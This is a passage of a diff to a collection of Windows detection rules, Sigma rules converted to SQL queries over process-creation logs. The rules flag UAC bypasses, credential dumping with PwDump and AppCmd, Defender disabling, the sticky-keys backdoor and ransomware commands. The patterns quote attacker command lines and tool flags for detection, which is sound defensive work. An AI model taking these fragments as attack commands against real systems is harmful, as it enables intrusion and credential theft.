CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen 
the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": 
"Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects the execution of 
msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": 
"Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' 
--dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - 
"attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + "description": "Detects a command used by conti to dump database", + 
"author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine 
LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' 
ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del 